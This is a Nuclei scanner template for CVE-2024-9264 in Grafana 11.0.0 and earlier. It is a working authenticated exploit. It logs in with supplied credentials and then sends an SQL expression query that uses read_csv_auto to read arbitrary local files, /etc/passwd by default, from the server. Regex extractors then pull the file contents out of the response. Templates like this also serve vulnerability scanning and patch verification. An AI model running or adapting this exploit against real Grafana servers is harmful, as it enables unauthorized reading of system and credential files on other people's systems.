id: CVE-2024-9264-LFI

info:
  name: Grafana <= 11.0.0 - Local File Inclusion
  author: byt3loss
  severity: high
  description: |
    Weaponize an SQLi to read remote files on Grafana 11.0.0 and earlier versions - CVE-2024-9264
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9264
    - https://www.sonicwall.com/blog/command-injection-and-local-file-inclusion-in-grafana-cve-2024-9264
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-9264
  tags: grafana,authenticated,lfi,exploit,cve

variables:
  rfile: "/etc/passwd"
  time: "{{unix_time()}}"

http:
  - method: POST
    path:
    - "{{RootURL}}/login"
    redirects: false
    max-redirects: 0
    headers:
      Referer: "{{RootURL}}"
      Content-Type: application/json
      Accept: application/json, text/plain, */*
    body: '{ "user": "{{username}}", "password": "{{password}}" }'

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words: 
          - '"message":"Logged in"'

  - method: POST
    path:
    - "{{RootURL}}/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101"
    redirects: true
    max-redirects: 3
    cookie-reuse: true
    headers:
      Content-Type: application/json
      Accept: application/json, text/plain, */*
    body: | 
      {
        "from": "{{time}}",
        "queries": [
            {
                "datasource": {
                    "name": "Expression",
                    "type": "__expr__",
                    "uid": "__expr__"
                },
                "expression": "SELECT * FROM read_csv_auto('{{rfile}}');",
                "hide": false,
                "refId": "B",
                "type": "sql",
                "window": ""
            }
        ],
        "to": "{{time}}"
      }
    
    extractors:
    - type: regex
      part: body
      group: 1
      regex:
        - '"values"\s*:\s*\[+\s*"(.+?)"\s*\]'
    
    - type: regex
      part: body
      group: 1
      regex:
        - '"(error"\s*:\s*".+?)"\s*,'